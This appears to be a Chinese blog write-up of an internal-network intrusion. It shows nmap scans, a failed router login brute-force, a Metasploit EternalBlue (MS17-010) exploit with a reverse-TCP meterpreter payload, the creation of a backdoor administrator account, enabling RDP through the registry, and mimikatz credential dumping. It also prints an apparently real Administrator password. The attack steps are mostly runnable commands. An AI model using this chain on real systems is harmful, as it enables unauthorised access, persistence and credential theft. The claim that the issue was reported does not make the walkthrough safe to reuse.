一次划水
首先用NMAP扫描的时候,扫描出一个8888端口是http协议的。
于是我把查看了 网关IP拼接端口号 丢到了浏览器访问 (IP:8888);
suoga,,,果不其然是一个Ikuai路由管理后台。
BURP前去探路,爆破无果。(五此输入错误会锁定账户)
找了CVE,,,并且尝试利用。。发现漏洞不存在,,可能(搬迁机房)已经修复。
GET权限
2):服务器system权限获取
虽然拿不下路由权限,那么我们干脆换一种思路。
直接上NMAP简单的的信息收集一波,
代码语言:javascript复制nmap -sP 192.168.10.254/24
查看目标机器开放的额信息
代码语言:javascript复制nmap -sV 192.168.10.240
可以看出这是一台 winserver2008 R2 服务器 并且开放了445端口。
那么可以尝试MS017-010攻击。
查看本机IP Kali攻击机IP
接下来我们丢出美少妇,,就是一顿梭。。。
代码语言:javascript复制search ms17-010
代码语言:javascript复制use auxiliary/scanner/smb/smb_ms17_010
set rhost 192.168.10.240
set rport 445
exploit
利用
代码语言:javascript复制use exploit/windows/smb/ms17_010_eternablue
set payload windows/x64/meterpreter/reverse_tcp
show options
设置参数
代码语言:javascript复制set rhost 192.168.10.240
set lhost 192.168.4.36
set lport 4444
show options
EXPLOIT
(失败)第一次 好像被动静有点大。。
服务器被打蓝屏了,,导致会话建立失败。
第二次,尝试,,会话反弹。。。
WHOAMI??
远程登录
登录win2008服务器
添加 administered用户Cat00011cat Cat_00011_cat
windows server 2008 R2 命令行的方式如何创建用户和设置密码
windows server 2008 R2 命令行的方式如何创建用户和设置密码
windows server 2008 R2 命令行的方式如何创建用户和设置密码
一、使用命令行的方式创建用户、设置密码
打开命令提示符
net user username password / add
例如:建立一个名为Cat00011cat、密码为Cat_00011_cat 的用户
代码语言:javascript复制net user Cat00011cat Cat_00011_cat /add
二、使用命令行修改旧帐户的密码
net user username password
例如:将用户Cat00011cat的密码设置为Cat_00011_cat
代码语言:javascript复制net user Cat00011cat Cat_00011_cat
三、使用命令行的方式创建本地组
net localgroup groupname /add
例如:添加一个名为sales的组
net localgroup sales /add
四、使用命令行的方式为本地组
net localgroup groupname username /add
例如:将用户名Cat00011cat加入到administrators组中
代码语言:javascript复制net localgroup administrators Cat00011cat/ add
开启3389端口
代码语言:javascript复制REG ADD HKLMSYSTEMCurrentControlSetControlTerminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /
run getgui -e //直接开启3389服务
发现用自己创建的账户并不能登录到目标主机,, 给administrator权限也不行。。 不知道啥原因。。。
最后只能load mimi拿超级管理员账号, 拿去hash解密。。
超级管理员信息: Administrator King2019
拿下PC
已上报协助修复